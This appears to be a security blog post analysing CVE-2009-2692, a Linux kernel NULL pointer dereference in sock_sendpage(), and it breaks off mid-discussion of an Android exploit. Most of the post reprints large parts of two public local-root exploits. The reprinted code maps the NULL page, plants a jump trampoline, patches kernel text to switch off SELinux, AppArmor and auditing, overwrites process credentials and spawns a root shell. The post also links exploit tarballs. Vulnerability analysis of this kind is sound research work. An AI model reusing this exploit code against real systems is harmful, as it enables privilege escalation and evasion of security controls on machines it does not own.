CVE-2009-2692: Linux kernel proto_ops NULL Pointer Dereference

It seems like another neat local root was killed while I was at HAR. The bug was disclosed by Tavis Ormandy and Julien Tinnes of the Google Security Team on 13 August 2009. According to the CVE entry, it affects Linux kernel 2.6 through 2.6.30.4 and 2.4.4 through 2.4.37.4. You can also read the original advisory here.
In the Linux kernel, each socket has an associated structure known as ‘proto_ops’, defined in include/linux/net.h, which contains function pointers for the various socket operations:

struct proto_ops {
        int             family;
        struct module   *owner;
        int             (*release)   (struct socket *sock);
        int             (*bind)      (struct socket *sock,
                                      struct sockaddr *myaddr,
                                      int sockaddr_len);
        int             (*connect)   (struct socket *sock,
                                      struct sockaddr *vaddr,
                                      int sockaddr_len, int flags);
        int             (*socketpair)(struct socket *sock1,
                                      struct socket *sock2);
        int             (*accept)    (struct socket *sock,
                                      struct socket *newsock, int flags);
     ...
};

If a protocol does not implement one of the ‘proto_ops’ operations, the corresponding slot is expected to point at a default routine from net/core/sock.c such as sock_no_bind(), sock_no_connect() or sock_no_accept(). Here are two examples of such routines:

/*
 * Set of default routines for initialising struct proto_ops when
 * the protocol does not support a particular function. In certain
 * cases where it makes no sense for a protocol to have a "do nothing"
 * function, some default processing is provided.
 */

int sock_no_bind(struct socket *sock, struct sockaddr *saddr, int len)
{
        return -EOPNOTSUPP;
}

int sock_no_connect(struct socket *sock, struct sockaddr *saddr,
                    int len, int flags)
{
        return -EOPNOTSUPP;
}
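
To make the idea concrete, here is a minimal user-space sketch of the same pattern. The names demo_ops, demo_no_connect() and so on are made up for illustration and are not kernel symbols. The only point is that a table whose unused slots point at stubs can be called without any NULL check.

```c
#include <errno.h>
#include <stddef.h>

/* Hypothetical, heavily simplified stand-in for struct proto_ops. */
struct demo_ops {
        int (*bind)(int fd);
        int (*connect)(int fd);
};

/* Default stub, modelled on sock_no_connect(). */
static int demo_no_connect(int fd)
{
        (void)fd;
        return -EOPNOTSUPP;
}

/* The one operation this pretend protocol really implements. */
static int demo_real_bind(int fd)
{
        (void)fd;
        return 0;
}

/* Every slot is filled in: unsupported operations get a stub, never NULL. */
static const struct demo_ops demo_proto_ops = {
        .bind    = demo_real_bind,
        .connect = demo_no_connect,
};

/* The caller can jump through the slot without validating it first. */
static int demo_call_connect(const struct demo_ops *ops, int fd)
{
        return ops->connect(fd);
}
```

Calling demo_call_connect(&demo_proto_ops, fd) returns -EOPNOTSUPP instead of crashing, which is exactly the guarantee that breaks down when a slot is left uninitialized.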

As the authors of the advisory say, normally, those function pointers should be checked before being invoked like this:

static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
                                struct pipe_inode_info *pipe, size_t len,
                                unsigned int flags)
{
        struct socket *sock = file->private_data;

        if (unlikely(!sock->ops->splice_read))
                return -EINVAL;

        return sock->ops->splice_read(sock, ppos, pipe, len, flags);
}

Here, sock_splice_read() checks whether ‘sock->ops->splice_read’ is NULL and invokes the callback only if it is not. However, J. Tinnes and T. Ormandy found that sock_sendpage() does not validate the function pointer before using it. Here is the susceptible code from net/socket.c:

static ssize_t sock_sendpage(struct file *file, struct page *page,
                             int offset, size_t size, loff_t *ppos, int more)
{
        struct socket *sock;
        int flags;

        sock = file->private_data;

        flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
        if (more)
                flags |= MSG_MORE;

        return sock->ops->sendpage(sock, page, offset, size, flags);
}

This code uses the ‘sock->ops->sendpage’ function pointer immediately, with no further checks. This means that it relies entirely on the ‘proto_ops’ structure having been initialized correctly. T. Ormandy and J. Tinnes also found that there are a few protocols that do not perform sufficient initialization. Specifically, the SOCKOPS_WRAP() macro of include/linux/net.h was not properly initializing the structure for the protocol families PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 and PF_AX25, and the initialization was also incomplete for PF_BLUETOOTH, PF_IUCV, PF_INET6 (with IPPROTO_SCTP), PF_PPPOX and PF_ISDN.
To fix this, the following patch was applied:

        if (more)
                flags |= MSG_MORE;
 
-       return sock->ops->sendpage(sock, page, offset, size, flags);
+       return kernel_sendpage(sock, page, offset, size, flags);
 }
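
A rough user-space model of what the fixed call path does: a wrapper checks the slot and uses a fallback when it is empty. All demo_* names are hypothetical. The fallback here simply returns an error to keep the sketch short, whereas the kernel's sock_no_sendpage() pushes the page through the regular sendmsg path.

```c
#include <errno.h>
#include <stddef.h>

/* Hypothetical one-slot operations table. */
struct demo_sock_ops {
        long (*sendpage)(const char *buf, size_t len);
};

/* A protocol-specific implementation: pretend everything was sent. */
static long demo_real_sendpage(const char *buf, size_t len)
{
        (void)buf;
        return (long)len;
}

/* Fallback for protocols that left the slot empty (simplified). */
static long demo_no_sendpage(const char *buf, size_t len)
{
        (void)buf;
        (void)len;
        return -EOPNOTSUPP;
}

/* Modelled on kernel_sendpage(): never jumps through a NULL pointer. */
static long demo_kernel_sendpage(const struct demo_sock_ops *ops,
                                 const char *buf, size_t len)
{
        if (ops->sendpage)
                return ops->sendpage(buf, len);
        return demo_no_sendpage(buf, len);
}
```

With a table whose sendpage member is NULL, demo_kernel_sendpage() returns the fallback's result, while the unpatched pattern would have called address 0.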

The patched code calls kernel_sendpage() instead, which checks ‘sock->ops->sendpage’ itself and falls back to sock_no_sendpage() when the pointer is NULL. Now, the exploitation is trivial. The authors included this trigger code in their advisory:

/* ... */
    int fdin = mkstemp(template);
    int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);

    unlink(template);

    ftruncate(fdin, PAGE_SIZE);

    sendfile(fdout, fdin, NULL, PAGE_SIZE);
/* ... */

They simply create a temporary file and a PF_PPPOX socket, unlink the temporary file and truncate it to PAGE_SIZE bytes, and finally invoke the sendfile(2) system call to send PAGE_SIZE bytes from the ‘fdin’ file to the PF_PPPOX socket. The NULL offset argument means that sendfile(2) reads from the current file position. sendfile(2) internally uses the sendpage() routine and, consequently, this triggers a NULL pointer dereference when the kernel attempts to execute ‘sock->ops->sendpage’, which is NULL for this socket.
spender wrote two exploits for that bug and published them as wunderbar_emporium.tgz and wunderbar_emporium2.tgz respectively.
Let’s have a look at his first code…
The tarball includes four files. File ‘tzameti.avi’ is a common AVI video, so we don’t care about that. Also, ‘pwnkernel.c’ is a simple program that sets the personality(2) to System V Release 4 and invokes pulseaudio with the compiled ‘exploit.c’ as a module. This technique was introduced by J. Tinnes to bypass the MMAP_MIN_ADDR protection when pulseaudio is installed.
Now, the actual exploit code resides in ‘exploit.c’ and starts like this:

int called_from_main = 0;
     ...
int main(void)
{
  called_from_main = 1;
  pa__init(NULL);
}

And guess what? pa__init() is the initialization routine that pulseaudio executes when the exploit is loaded as a module through the -L flag. It goes like this:

int pa__init(void *m)
{
        char *mem = NULL;
        int d;
        int ret;

        our_uid = getuid();

        if ((personality(0xffffffff)) != PER_SVR4) {
                mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
                if (mem != NULL) {
                        /* for old kernels with SELinux that don't allow RWX anonymous mappings
                           luckily they don't have NX support either ;) */
                        mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
                        if (mem != NULL) {
                                fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
                                return 1;
                        }
                }
        } else {
                ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
                if (ret == -1) {
                        fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
                        return 1;
                }
        }

        fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");

So, if the execution personality is not PER_SVR4, it will attempt to map the first page of the address space, starting at the NULL address, with read, write and execute permissions. Note that mmap(2) returns the mapped address, so with MAP_FIXED at address 0 a return value of NULL means success. If this fails, it could be because some kernels with SELinux don’t allow rwx anonymous mappings, as the comment states. Since those kernels do not implement the NX bit either, mapping the page as read + write is enough. If the personality is already System V Release 4, page zero is already mapped and the exploit uses mprotect(2) to change it to rwx. The following code from that function is:

        selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
        selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
        apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
        apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
        apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
        apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
        security_ops = (unsigned long *)get_kernel_sym("security_ops");
        default_security_ops = get_kernel_sym("default_security_ops");
        sel_read_enforce = get_kernel_sym("sel_read_enforce");
        audit_enabled = (int *)get_kernel_sym("audit_enabled");
        commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

Function get_kernel_sym() is a simple parser of /proc/kallsyms (or /proc/ksyms on older kernels) that returns the address of the symbol passed to it as an argument. Its code is simple, as you can read here:

static unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[256];
        int ret;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL) {
                        fprintf(stdout, "Unable to obtain symbol listing!\n");
                        return 0;
                }
        }

        ret = 0;
        while(ret != EOF) {
                ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        return 0;
}
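
For readers who want to play with the parsing logic without touching a real kernel, here is a small sketch that runs the same kind of lookup over a sample listing. lookup_symbol() and make_sample_listing() are my own illustrative helpers and the addresses are invented. Unlike the original, it reads line by line and bounds the symbol name with %255s.

```c
#include <stdio.h>
#include <string.h>

/*
 * Look up `name` in a stream of "address type symbol" lines, the layout
 * used by /proc/kallsyms. Returns 0 when the symbol is not found.
 */
static unsigned long lookup_symbol(FILE *f, const char *name)
{
        char line[512];
        char sname[256];
        char type;
        unsigned long addr;

        while (fgets(line, sizeof(line), f) != NULL) {
                /* Anything after the symbol name (e.g. a module tag) is ignored. */
                if (sscanf(line, "%lx %c %255s", &addr, &type, sname) != 3)
                        continue;
                if (strcmp(sname, name) == 0)
                        return addr;
        }
        return 0;
}

/* Demonstration helper: a temporary file holding made-up entries. */
static FILE *make_sample_listing(void)
{
        FILE *f = tmpfile();

        if (f == NULL)
                return NULL;
        fputs("c0100000 T _text\n"
              "c0123450 T commit_creds\n"
              "c0123800 T prepare_kernel_cred\t[demo]\n", f);
        rewind(f);
        return f;
}
```

Passing the stream returned by make_sample_listing() to lookup_symbol() together with "commit_creds" yields the address from the second line, and an unknown name yields 0, which is how the exploit notices that a symbol is missing.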

After retrieving all of the above symbols from the running kernel, the exploit does this:

        mem[0] = '\xff';
        mem[1] = '\x25';
        *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : 6;
        *(unsigned long *)&mem[6] = (unsigned long)&own_the_kernel;
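
As far as I can tell, the reason for these particular bytes is that ff 25 is the x86 encoding of an indirect jump through a pointer in memory. On 32bit the four bytes that follow are the absolute address of that pointer (6), while on 64bit they are a displacement from the next instruction, which also starts at address 6, hence 0. The sketch below builds the same bytes in an ordinary buffer instead of the NULL page. build_indirect_jmp() is a hypothetical helper, not part of the exploit.

```c
#include <stdint.h>
#include <string.h>

/*
 * Write the trampoline into buf (at least 6 + sizeof(unsigned long) bytes),
 * pretending that buf[0] will live at address 0. Returns the bytes written.
 */
static size_t build_indirect_jmp(unsigned char *buf, unsigned long target)
{
        /* 32bit: absolute address 6. 64bit: RIP-relative displacement 0. */
        uint32_t operand = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : 6;

        buf[0] = 0xff;                              /* opcode group 5 */
        buf[1] = 0x25;                              /* ModRM: /4 = jmp, memory operand */
        memcpy(&buf[2], &operand, sizeof(operand));
        memcpy(&buf[6], &target, sizeof(target));   /* the pointer the jmp reads */
        return 6 + sizeof(target);
}
```

When the kernel calls the NULL function pointer, execution starts at address 0, runs this single jump and continues at whatever address was stored at offset 6.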

He places 0xff at NULL and 0x25 at NULL+1, then writes a 32-bit value at NULL+2 (0 on 64bit architectures and 6 on 32bit ones) and, finally, stores the address of the ‘own_the_kernel’ routine at NULL+6. Let’s move to this routine…

static int __attribute__((regparm(3))) own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e)
{
        got_ring0 = 1;

        if (audit_enabled)
                *audit_enabled = 0;

        // disable apparmor
        if (apparmor_enabled && *apparmor_enabled) {
                what_we_do = 1;
                *apparmor_enabled = 0;
                if (apparmor_audit)
                        *apparmor_audit = 0;
                if (apparmor_logsyscall)
                        *apparmor_logsyscall = 0;
                if (apparmor_complain)
                        *apparmor_complain = 0;
        }

First of all, GCC’s regparm attribute causes the first three arguments of own_the_kernel() to be passed in registers, as we can read in GCC’s documentation. The routine then checks the auditing and AppArmor variables and, where the symbols were resolved, sets their values to 0. By doing this, he disables those protections. The code continues like this:

        // disable SELinux
        if (selinux_enforcing && *selinux_enforcing) {
                what_we_do = 2;
                *selinux_enforcing = 0;
        }

        if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) {
                // trash LSM
                if (default_security_ops && security_ops) {
                        if (*security_ops != default_security_ops)
                                what_we_do = 3;
                        *security_ops = default_security_ops;
                }
        }

Here, SELinux enforcing is also set to 0 if it has a non-zero value. If SELinux is not enabled, ‘security_ops’ is pointed back at ‘default_security_ops’, which removes any other registered LSM. The following code in own_the_kernel() routine is:

        /* make the idiots think selinux is enforcing */
        if (sel_read_enforce) {
                unsigned char *p;
                unsigned long _cr0;

                asm volatile (
                "mov %%cr0, %0"
                : "=r" (_cr0)
                );
                _cr0 &= ~0x10000;
                asm volatile (
                "mov %0, %%cr0"
                :
                : "r" (_cr0)
                );
                if (sizeof(unsigned int) != sizeof(unsigned long)) {
                        /* 64bit version, look for the mov ecx, [rip+off]
                           and replace with mov ecx, 1
                        */
                        for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
                                if (p[0] == 0x8b && p[1] == 0x0d) {
                                        p[0] = '\xb9';
                                        p[5] = '\x90';
                                        *(unsigned int *)&p[1] = 1;
                                }
                        }

This is a clever approach. He reads the CR0 control register into the '_cr0' local variable, clears bit 0x10000 and writes the value back, so that the read-only kernel code can be modified. Then, if this is a 64bit platform (the check is that 'int' and 'long' differ in size), it scans the first 0x30 (48 in decimal) bytes of sel_read_enforce() to find the "mov ecx, [rip+off]" instruction and replaces it with "mov ecx, 1", as the comment describes. If the system is a 32bit architecture, the following code will be executed:

                } else {
                        /* 32bit, replace push [selinux_enforcing] with push 1 */
                        for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
                                if (p[0] == 0xff && p[1] == 0x35) {
                                        // while we're at it, disable
                                        // SELinux without having a
                                        // symbol for selinux_enforcing ;)
                                        if (!selinux_enforcing) {
                                                sel_enforce_ptr = *(unsigned int **)&p[2];
                                                *sel_enforce_ptr = 0;
                                                what_we_do = 2;
                                        }
                                        p[0] = '\x68';
                                        p[5] = '\x90';
                                        *(unsigned int *)&p[1] = 1;
                                }
                        }
                }
                _cr0 |= 0x10000;
                asm volatile (
                "mov %0, %%cr0"
                :
                : "r" (_cr0)
                );
        }
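
The byte patching itself is easy to try out on a plain buffer. The following is only a sketch of the 32bit variant: patch_push_mem() is a made-up name, it works on ordinary memory rather than kernel text, and unlike the original loop it stops six bytes before the end of the window and skips over the bytes it has just rewritten.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scan the first `window` bytes of `code` for "ff 35 <addr32>" (push [mem])
 * and rewrite each hit as "68 <1 as imm32> 90" (push 1; nop). Both forms are
 * six bytes long, so the surrounding code keeps its layout.
 * Returns the number of sites patched.
 */
static int patch_push_mem(unsigned char *code, size_t window)
{
        int patched = 0;
        size_t i;

        for (i = 0; i + 6 <= window; i++) {
                if (code[i] == 0xff && code[i + 1] == 0x35) {
                        uint32_t one = 1;

                        code[i] = 0x68;                          /* push imm32 */
                        memcpy(&code[i + 1], &one, sizeof(one)); /* the immediate */
                        code[i + 5] = 0x90;                      /* nop fills the gap */
                        patched++;
                        i += 5;                                  /* skip the patched bytes */
                }
        }
        return patched;
}
```

The nop matters because "push imm32" is one byte shorter than "push [mem]". Without it the leftover address byte would be decoded as the start of the next instruction.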

This is pretty much the same thing for a different architecture. It scans from 'sel_read_enforce' up to 'sel_read_enforce+0x20' to find the specified bytes and patch them. Finally, flag 0x10000 (X86_CR0_WP, the Write Protect flag defined in arch/x86/include/asm/processor-flags.h) is set again in the '_cr0' variable, which is then loaded back into the CR0 control register. Now that the LSMs are disabled, the own_the_kernel() routine finishes like this:

        // push it real good
        give_it_to_me_any_way_you_can();

        return -1;
}

It is the usual shellcode for Linux kernel exploitation as you can easily see here...

static void give_it_to_me_any_way_you_can(void)
{
        if (commit_creds && prepare_kernel_cred) {
                commit_creds(prepare_kernel_cred(0));
                got_root = 1;

This code checks that the addresses of commit_creds() and prepare_kernel_cred() were resolved through procfs. If so, it calls commit_creds(), defined in kernel/cred.c, passing it the return value of prepare_kernel_cred(0), which is a fresh set of root credentials, so that our task ends up with them. It then sets the 'got_root' flag to 1. If either of those two routines could not be resolved, the code path will be:

        } else {
                unsigned int *current;
                unsigned long orig_current;
                unsigned long orig_current_4k = 0;

                if (sizeof(unsigned long) != sizeof(unsigned int))
                        orig_current = get_current_x64();
                else {
                        orig_current = orig_current_4k = get_current_4k();
                        if (orig_current == 0)
                                orig_current = get_current_8k();
                }

Depending on the architecture, get_current_x64(), get_current_4k() and/or get_current_8k() will be invoked. Those are three simple routines that retrieve the task_struct location of our process.

static inline unsigned long get_current_4k(void)
{
        unsigned long current = 0;
#ifndef __x86_64__
        asm volatile (
        " movl %%esp, %0;"
        : "=r" (current)
        );
#endif
        current = *(unsigned long *)(current & 0xfffff000);
        if (current < 0xc0000000 || current > 0xfffff000)
                return 0;

        return current;
}

static inline unsigned long get_current_8k(void)
{
        unsigned long current = 0;

#ifndef __x86_64__
        asm volatile (
        " movl %%esp, %0;"
        : "=r" (current)
        );
#endif
        current &= 0xffffe000;
        eightk_stack = 1;
        if ((*(unsigned long *)current < 0xc0000000) || (*(unsigned long *)current > 0xfffff000)) {
                twofourstyle = 1;
                return current;
        }
        return *(unsigned long *)current;
}

static inline unsigned long get_current_x64(void)
{
        unsigned long current = 0;
#ifdef __x86_64__
        asm volatile (
        "movq %%gs:(0), %0"
        : "=r" (current)
        );
#endif
        return current;
}
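
The 32bit variants rely on the fact that the kernel stack is aligned to its own size, so masking the stack pointer gives the bottom of the stack, where 2.6 kernels keep the thread_info structure whose first field points to the task_struct. A tiny sketch of the arithmetic, with helper names of my own choosing and example addresses picked at random:

```c
#include <stdint.h>

/* Round a kernel stack pointer down to the base of its stack area. */
static uint32_t stack_base(uint32_t esp, uint32_t stack_size)
{
        return esp & ~(stack_size - 1);   /* stack_size must be a power of two */
}

/* Same sanity check as the exploit: is this inside the 32bit kernel range? */
static int looks_like_kernel_ptr(uint32_t v)
{
        return v >= 0xc0000000u && v <= 0xfffff000u;
}
```

For a stack pointer of 0xc1235abc, a 4k stack gives a base of 0xc1235000 and an 8k stack gives 0xc1234000. The exploit reads the first word at that base and, if it does not look like a kernel pointer, assumes the other stack size or a 2.4 style layout where the task_struct itself sits at the bottom of the stack.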

Having the exact location of our process’ task_struct allows the exploit to move on and execute this:

repeat:
                current = (unsigned int *)orig_current;
                while (((unsigned long)current < (orig_current + 0x1000 - 17 )) &&
                        (current[0] != our_uid || current[1] != our_uid ||
                         current[2] != our_uid || current[3] != our_uid))
                        current++;

                if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
                        if (orig_current == orig_current_4k) {
                                orig_current = get_current_8k();
                                goto repeat;
                        }
                        return;
                }
                got_root = 1;
                memset(current, 0, sizeof(unsigned int) * 8);
        }

        return;
}
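
The search can be modelled in user space on a fake array. This is just a sketch with invented data. zero_uid_run() is a hypothetical helper that mirrors the loop above: look for four equal words and wipe eight words starting there.

```c
#include <stddef.h>
#include <string.h>

/*
 * Search `words` for four consecutive entries equal to `uid`, then zero
 * eight entries starting at the first of them.
 * Returns 1 on success, 0 if no such run exists.
 */
static int zero_uid_run(unsigned int *words, size_t count, unsigned int uid)
{
        size_t i;

        for (i = 0; i + 8 <= count; i++) {
                if (words[i] == uid && words[i + 1] == uid &&
                    words[i + 2] == uid && words[i + 3] == uid) {
                        memset(&words[i], 0, 8 * sizeof(unsigned int));
                        return 1;
                }
        }
        return 0;
}
```

Requiring four matches in a row keeps the chance of hitting an unrelated field low, and wiping eight words covers the group IDs that follow the user IDs.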

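This scans almost the entire page starting at the task_struct’s address for four consecutive copies of our UID and, once they are found, zeroes eight consecutive words from that point (0 is the ID of root) using memset(). On kernels of that era these are the uid, euid, suid and fsuid fields followed by the four GID fields. Finally, we can move back to pa__init() and continue from where we left off…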

        /* trigger it */
        {
                char template[] = "/tmp/sendfile.XXXXXX";
                int in, out;

                // Setup source descriptor
                if ((in = mkstemp(template)) < 0) {
                        fprintf(stdout, "failed to open input descriptor, %m\n");
                        return 1;
                }

                unlink(template);

This is a common temporary file creation and unlinking...

#define DOMAINS_STOP -1
   ...
const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 },
        {PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 },
        {PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 },
        {PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 },
        {PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP },
        {PF_PPPOX, SOCK_DGRAM, 0 },
        {PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP },
        {DOMAINS_STOP, 0, 0 }
        };
   ...
                // Find a vulnerable domain
                d = 0;
repeat_it:
                for (; domains[d][0] != DOMAINS_STOP; d++) {
                        if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0)
                                break;
                }

                if (out < 0) {
                        fprintf(stdout, "unable to find a vulnerable domain, sorry\n");
                        return 1;
                }

                // Truncate input file to some large value
                ftruncate(in, getpagesize());

                // sendfile() to trigger the bug.
                sendfile(out, in, NULL, getpagesize());
        }

Here, it walks the 'domains' array until it finds a protocol family for which it is allowed to create a socket. If it finds one, it breaks out of the for loop, truncates the 'in' temporary file to the size of a page and, finally, triggers the bug through the sendfile(2) system call as J. Tinnes demonstrated. The kernel then calls the NULL sock->ops->sendpage callback, lands on the code placed in the NULL page and ends up executing the exploit's own_the_kernel().
If everything works as expected, the pa__init() routine will continue like this:

        if (got_ring0) {
                fprintf(stdout, " [+] got ring0!\n");
        } else {
                d++;
                goto repeat_it;
        }

        fprintf(stdout, " [+] detected %s %dk stacks\n",
                twofourstyle ? "2.4 style" : "2.6 style",
                eightk_stack ? 8 : 4);

        extract_and_play_video();

If the callback did not run, it jumps back to the trigger code and retries with the next entry of 'domains'. Otherwise, it calls extract_and_play_video(), a simple routine that extracts the video using fseek() to jump to its location and then plays it using mplayer. The last part of pa__init() is exactly what you'd be expecting:

        {
                char *msg;
                switch (what_we_do) {
                        case 1:
                                msg = "AppArmor";
                                break;
                        case 2:
                                msg = "SELinux";
                                break;
                        case 3:
                                msg = "LSM";
                                break;
                        default:
                                msg = "nothing, what an insecure machine!";
                }
                fprintf(stdout, " [+] Disabled security of : %s\n", msg);
        }
        if (got_root == 1)
                fprintf(stdout, " [+] Got root!\n");
        else {
                fprintf(stdout, " [+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?\n");
                exit(0);
        }

        execl("/bin/sh", "/bin/sh", "-i", NULL);

        return 0;
}

It checks the flag 'what_we_do' and informs the user of what security modules have been disabled, and at last... it spawns a new /bin/sh process with credentials set to 0.
The second release of the wunderbar emporium exploit is wunderbar_emporium2.tgz (http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz), which differs from the first release only in wunderbar_emporium.sh. The second release uses /selinux/enforce instead of /usr/sbin/getenforce and runs the exploit using runcon(1) in the security context of various applications that may be allowed to map the NULL page. Those include wine_t, vbetool_t, unconfined_mono_t and samba_unconfined_net_t.
Another exploit was released (http://www.frasunek.com/proto_ops.tgz) by Przemysław Frasunek (http://www.frasunek.com/). The main() routine is quite simple. He checks the personality, maps the NULL page (or makes it executable if the personality is already System V R4) and places a jump to the kernel_code() function at address 0, where the kernel lands when it calls the NULL sendpage callback. The trigger code is almost exactly the same as the one in spender's code...


int main(void) {
        char template[] = "/tmp/padlina.XXXXXX";
        int fdin, fdout;
        void *page;

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        if ((personality(0xffffffff)) != PER_SVR4) {
                if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
                        perror("mmap");
                        return -1;
                }
        } else {
                if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
                        perror("mprotect");
                        return -1;
                }
        }

        *(char *)0 = '\x90';
        *(char *)1 = '\xe9';
        *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

        if ((fdin = mkstemp(template)) < 0) {
                perror("mkstemp");
                return -1;
        }

        if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
                perror("socket");
                return -1;
        }

        unlink(template);
        ftruncate(fdin, PAGE_SIZE);
        sendfile(fdout, fdin, NULL, PAGE_SIZE);
}
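
The three writes at addresses 0, 1 and 2 build "nop; jmp rel32". Since the displacement of a relative jump is counted from the end of the instruction, and the instruction ends at address 6 (one nop byte, one opcode byte, four displacement bytes), the value stored has to be the target minus 6. Here is a sketch on a normal buffer, assuming a 32bit target. Both function names are invented for the example.

```c
#include <stdint.h>
#include <string.h>

/*
 * Emit "nop; jmp rel32" into buf, assuming buf[0] will be placed at
 * address `base`. rel32 is measured from the end of the jmp, base + 6.
 */
static void build_relative_jmp(unsigned char *buf, uint32_t base, uint32_t target)
{
        uint32_t rel = target - (base + 6);

        buf[0] = 0x90;                       /* nop */
        buf[1] = 0xe9;                       /* jmp rel32 */
        memcpy(&buf[2], &rel, sizeof(rel));
}

/* Compute the address the CPU would continue at after the jmp. */
static uint32_t relative_jmp_target(const unsigned char *buf, uint32_t base)
{
        uint32_t rel;

        memcpy(&rel, &buf[2], sizeof(rel));
        return base + 6 + rel;
}
```

With base 0 the stored displacement is exactly target - 6, which matches the expression in main() above.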

Function kernel_code() is a common scan-for-UIDs-in-task_struct routine.

void kernel_code()
{
        int i;
        uint *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();
}

And get_current() is another simple routine for retrieving the location of our process' task_struct on x86.

static inline __attribute__((always_inline)) void *get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
                "movl %%esp, %%eax ;"
                "andl %1, %%eax ;"
                "movl (%%eax), %0"
                : "=r" (curr)
                : "i" (~8191)
        );
        return (void *) curr;
}

And finally, exit_kernel() is a routine to return smoothly to user space through an interrupt return and execute exit_code()...

static inline __attribute__((always_inline)) void exit_kernel()
{
        __asm__ __volatile__ (
                "movl %0, 0x10(%%esp) ;"
                "movl %1, 0x0c(%%esp) ;"
                "movl %2, 0x08(%%esp) ;"
                "movl %3, 0x04(%%esp) ;"
                "movl %4, 0x00(%%esp) ;"
                "iret"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

     ...

void exit_code()
{
        if (getuid() != 0) {
                fprintf(stderr, "failed\n");
                exit(-1);
        }

        execl("/bin/sh", "sh", "-i", NULL);
}
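
The five stores in exit_kernel() lay out the frame that a 32bit iret to user mode pops from the stack. Written as a struct (the type name iret_frame is mine, purely for illustration), the offsets used in the inline assembly become obvious:

```c
#include <stddef.h>
#include <stdint.h>

/* What a 32bit iret to a lower privilege level pops, lowest address first. */
struct iret_frame {
        uint32_t eip;     /* 0x00: where user-mode execution resumes (exit_code) */
        uint32_t cs;      /* 0x04: user code segment selector (USER_CS) */
        uint32_t eflags;  /* 0x08: flags to restore (USER_FL) */
        uint32_t esp;     /* 0x0c: user stack pointer (top of exit_stack) */
        uint32_t ss;      /* 0x10: user stack segment selector (USER_SS) */
};
```

So the exploit does not return to the interrupted system call at all. It fabricates a return to exit_code() in user mode on a stack of its own.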

This is probably one of the most straightforward to exploit NULL pointer dereference vulnerabilities in the Linux kernel.

UPDATE:
Also, please read this post by stealth (http://c-skills.blogspot.com/2009/08/note-on-cve-2009-2692.html).

UPDATE (19 Aug 2009):

Another cool exploit for that issue on Android was released by Zinx (http://milw0rm.com/sploits/android-root-20090816.tar.gz). As we can read from the Makefile, the exploit is compiled for the ARM architecture like this:


ifdef TOPDIR

obj-m += own.o

else

default:
	$(MAKE) -C $(KERNEL_DIR) ARCH=arm CROSS_COMPILE=$(CROSS_COMPILE) KBUILD_VERBOSE=1 M=$(PWD) modules

distclean:
	rm -f *.ko *.o .*.cmd *.mod.c Module.symvers modules.order

endif

The actual exploit code is fairly simple. File rootsh.c starts out like this:

int main(void)
